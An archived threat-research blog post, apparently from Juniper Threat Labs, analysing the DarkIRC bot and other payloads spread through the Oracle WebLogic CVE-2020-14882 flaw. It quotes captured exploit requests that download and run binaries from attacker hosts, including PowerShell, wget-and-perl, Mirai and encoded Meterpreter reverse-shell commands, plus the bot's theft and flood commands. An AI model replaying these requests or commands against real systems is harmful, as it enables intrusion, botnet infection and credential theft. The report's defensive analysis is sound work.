{
	"id": "a7a1f684-22e5-490f-9c4d-7c3f17824aac",
	"created_at": "2026-04-06T00:10:15.512703Z",
	"updated_at": "2026-04-10T03:20:42.062341Z",
	"deleted_at": null,
	"sha1_hash": "438d9614927c8ea4a0ce70fee2346a87b211f768",
	"title": "DarkIRC bot exploits recent Oracle WebLogic vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 654537,
	"plain_text": "DarkIRC bot exploits recent Oracle WebLogic vulnerability\r\nBy Paul Kimayong\r\nPublished: 2020-12-01 · Archived: 2026-04-05 22:00:40 UTC\r\nJuniper Threat Labs is seeing active attacks on Oracle WebLogic software using CVE-2020-14882. This\r\nvulnerability, if successfully exploited, allows unauthenticated remote code execution. As of this writing, we\r\nfound 3,109 open Oracle WebLogic servers using Shodan. We are seeing at least five different variants of\r\nattacks/payloads. For the purpose of this blog, we will focus on one particular payload that installs a bot called\r\nDarkIRC. This bot performs a unique command and control domain generation algorithm that relies on the sent\r\nvalue of a particular crypto wallet. This bot is currently being sold on hack forums for $75USD.\r\nhttps://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability\r\nPage 1 of 12\n\nOpen Oracle WebLogic servers on the internet\r\nDarkIRC\r\nDarkIRC version\r\nThe attack issues an HTTP GET request to a vulnerable WebLogic server, which will execute a PowerShell script\r\nto download and execute a binary file hosted at cnc[.]c25e6559668942[.]xyz\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026_pageLable=\u0026handle=com.tangosol.coheren\r\n(%22java.lang.Runtime.getRuntime().exec('powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%\r\n(New-Object%20System.Net.WebClient).DownloadFile(%22https://cnc.c25e655{redacted}xyz/svchost.exe%22,%\r\n%20Start-Process%20%22$env:temp%0Degsvc.exe%22%22');%22); HTTP/1.1\r\nHost: {redacted}:7001\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.24.0\r\nThe source IP is 83.97.20.90. This IP resolves to the C\u0026C of this bot, which means the attacker IP is the same as\r\nthe C\u0026C. 
The sha256 hash of the payload is\r\nd78c90684abcd21b26bccf4b6258494a894d9b8d967a79639f0815a17e1e59a5. This payload is a .NET file with a\r\nfile size of 6MB, fairly encrypted, and has the following properties:\r\nBasic structure of the crypter\r\nThe Crypter\r\nThe crypter, or packer, is used primarily to conceal the payload's true intention and avoid detection. It also includes\r\nanti-analysis and anti-sandbox functions. It tries to detect whether it is running under one of the following virtualized\r\nenvironments to determine whether it should not continue its malicious routine:\r\nVMware\r\nVirtualBox\r\nVBox\r\nQEMU\r\nXen\r\nIf it is not, it will load an encrypted file from its resources.\r\nDarkIRC Crypter virtual environment check\r\nAfter unpacking, we can clearly see what this malware wants to do, based on the names of its functions.\r\nFunctions inside DarkIRC when unpacked\r\nBot Functions\r\nThe bot installs itself as %APPDATA%\\Chrome\\Chrome.exe and creates an autorun entry. Its\r\nfunctions include:\r\nBrowser Stealer\r\nKeylogging\r\nBitcoin Clipper\r\nDDoS\r\nSlowloris\r\nRUDY (R-U-DeadYet?)\r\nTCP Flood\r\nHTTP Flood\r\nUDP Flood\r\nSyn Flood\r\nWorm or spread itself in the network\r\nDownload Files\r\nExecute Commands\r\nBitcoin Clipper\r\nThis function allows the malware to change a copied bitcoin wallet address to the malware operator’s bitcoin\r\nwallet address. This essentially allows it to steal bitcoin transactions on the infected system. 
This is similar to what\r\nMasad Stealer does.\r\nDarkIRC clipping routine\r\nBitcoin address used by the malware operator:\r\n3QRwJwLRFDBoeLZ2cToGUsdBGB3eqj3exH\r\nIt connects to its Command and Control via IRC with an added layer of XOR encryption.\r\nCnC communication is encrypted via XOR\r\nBelow are the bot commands:\r\nCommand Action\r\nsteal Steal browser passwords\r\nmssql Spread via mssql (brute force)\r\nstopall Stop all flood attacks\r\nrudy Start or stop rudy flood attacks. If the command includes stop, it means stop rudy attacks.\r\nrdp Spread via RDP (brute force)\r\nupdate Update this bot\r\nupload Upload files\r\ndlexerem Download, execute and remove\r\nudp Start/Stop udp flood attacks\r\nversion Get version info of the infected system\r\ndlexe Download and execute\r\nusername Get username of the infected system\r\ncd Set current directory\r\ngetip Get IP address of the infected system\r\nmd5 Get config md5 of bot\r\nusbspread Spread via USB\r\ntcp Start/Stop tcp flood attack\r\ndiscord Steal discord token\r\nbotversion Get bot version\r\nsyn Syn flood\r\nhttp Http flood\r\nslowloris Slowloris DDoS attack\r\nuninstall Uninstall itself\r\nsmb Spread via SMB\r\ncmd Run command\r\nCommand and Control DGA\r\nOne of its interesting functions is to generate a domain based on the value of a particular dogecoin wallet,\r\nDHeMmdtVhMYQxjbhe2yKvm8nbjSx1At6cZ\r\nIt hashes the sent value of the wallet and takes the first 14 characters of the hash to complete the cnc domain below:\r\ncnc.\u003cgenerated hash[:14]\u003e.xyz\r\nAt its current value, the resulting domain will be:\r\ncnc[dot]c25e6559668942.xyz\r\nDarkIRC uses a DGA that depends on the sent value of a particular dogecoin wallet\r\nThe URL request returns a JSON-formatted 
string, which includes the amount “sent” from that wallet.\r\nCurrent sent value of the wallet that the DGA relies on.\r\nIn the event that the existing domain is taken down, the malware operator could make a transaction that\r\nchanges the “sent” value of the wallet, which will generate a new cnc domain for all the bots.\r\nWho is behind this?\r\nWe found an account on Hack Forums by the name of “Freak_OG” that advertised this botnet back in August\r\n2020 for $75USD.\r\nThreat actor advertising on hack forums.\r\nOn November 1, the same account posted a FUD (Fully Undetected) Crypter, selling it for $25USD. The filename\r\nof the file he is showing in this post resembles the “Application Name” of our payload, WindowsFormsApp2.exe.\r\nThreat actor advertising its crypter\r\nWe are not certain whether the bot operator who attacked our honeypot is the same person who is advertising this\r\nmalware on Hack Forums or one of his/her customers.\r\nConclusion\r\nThreat actors will always be on the hunt for victims. One of the fastest ways for them to find victims is to use a\r\nzero-day exploit against the whole internet, usually via a spray-and-pray technique.\r\nThis vulnerability was fixed by Oracle in October, and a subsequent out-of-cycle patch was also released in\r\nNovember to fix a hole in the previous patch. 
We recommend that affected systems be patched immediately.\r\nOracle WebLogic RCE attacks\r\nBelow is brief information about the different attacks we have seen from our sensors and the payloads they try to\r\ninstall.\r\nAttack Variant 1: Cobalt Strike Payload\r\nAttacker IP: 45.77.178.169\r\nAttack Port: 7001\r\nIOC: 139[.]180.194.87\r\nGET /console/css/%252e%252e%252fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellS\r\n(weblogic.work.ExecuteThread)Thread.currentThread();%20weblogic.work.WorkAdapter%20adapter%20=%20cur\r\n=%20adapter.getClass().getDeclaredField(%22connectionHandler%22);field.setAccessible(true);Object%20o\r\nweblogic.servlet.internal.ServletRequestImpl%20req%20=%20(weblogic.servlet.internal.ServletRequestImp\r\n%20String%20cmd%20=%20req.getHeader(%22cmd%22);String%5B%5D%20cmds%20=%20System.getProperty(%22os.nam\r\ncmd.exe%22,%20%22/c%22,%20cmd%7D%20:%20new%20String%5B%5D%7B%22/bin/sh%22,%20%22-c%22,%20cmd%7D;if(cm\r\n(new%20java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(%22%5C%5CA%22).next();%2\r\n(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(%22getResponse%22).invoke(req\r\n(new%20weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();%7D%20curren\r\nUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\ncmd: powershell -ENC DQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAA\r\nThe PowerShell script executes shellcode, which downloads from https://139[.]180.194.87:2233/LkQT. The URL\r\ndid not return anything during our test. 
Based on threat intelligence, this IP is related to Cobalt Strike.\r\nShellcode downloading Cobalt Strike\r\nAttack Variant 2: Perlbot Payload\r\nAttacker IP: 85.248.227.163\r\nAttack Port: 7001\r\nPayload Hash: ef7df0f86ed1a1bca365d7247d60384ece4687db28e5ec9aee1a61b1cfa4befa\r\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.0\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\ncmd: unset HISTFILE;unset HISTSAVE;wget https://159.69.66.124/bo;perl bo;rm -rf bo\r\nContent-Length: 1216\r\n_nfpb=true\u0026_pageLabel=HomePage1\u0026handle=com.tangosol.coherence.mvel2.sh.ShellSession\r\n('weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\r\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect...{redacted}\r\nAttack Variant 3: Meterpreter Payload\r\nAttacker IP: 185.65.134.178\r\nAttack Port: 7001\r\nPayload Hash: 4bafb11609f744948f7adbba60b8f122906d6cb079b1a1f3b9ba82f362e03889\r\nPOST /console/css/.%252e/console.portal HTTP/1.1\r\nHost: {redacted}:7001\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2304\r\nhandle=com.tangosol.coherence.mvel2.sh.ShellSession%28%27java.lang.Runtime.getRuntime%28%29.exec%28ne\r\njava.lang.String%28java.util.Base64.getDecoder%28%29.decode%28%22cG93ZXJzaGVsbCAtdyBoaWRkZW4gLW5vcCAt\r\n0nMTg1LjY1LjEzNC4xNzgnOyRiPTg3Nzc7JGM9TmV3LU9iamVjdCBzeXN0ZW0ubmV0LnNvY2tldHMudGNwY2xpZW50OyRuYj1OZXc\r\nN0IFN5c3RlbS5CeXRlW10gJGMuUmVjZWl2ZUJ1ZmZlcl{redacted}\r\nAttack Variant 4: 
Mirai Payload\r\nAttacker IP: 83.97.20.90\r\nAttack Port: 7001\r\nPayload Hash: 81d51082566d3cebbc8d0d3df201a342f8056efbfb95a7778b6f5d56a264fb07\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026_pageLable=\u0026\r\nhandle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec\r\n('wget%20https://83[dot]97.20.90/mirai.x86%20-O%20/tmp/kpin;chmod%20777%20/tmp/kpin;/tmp/kpin');\r\n%22); HTTP/1.1\r\nHost: {redacted}:7001\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.24.0\r\nContent-type: application/x-www-form-urlencoded; charset=utf-8\r\nThe exploit is detected by IDP as “HTTP:ORACLE:WLOGIC-UNAUTH-RCE”.\r\nJuniper Advanced Threat Prevention (ATP) detects this file.\r\nSource: https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability"
	],
	"report_names": [
		"darkirc-bot-exploits-oracle-weblogic-vulnerability"
	],
	"threat_actors": [],
	"ts_created_at": 1775434215,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.pdf",
		"text": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.txt",
		"img": "https://archive.orkl.eu/438d9614927c8ea4a0ce70fee2346a87b211f768.jpg"
	}
}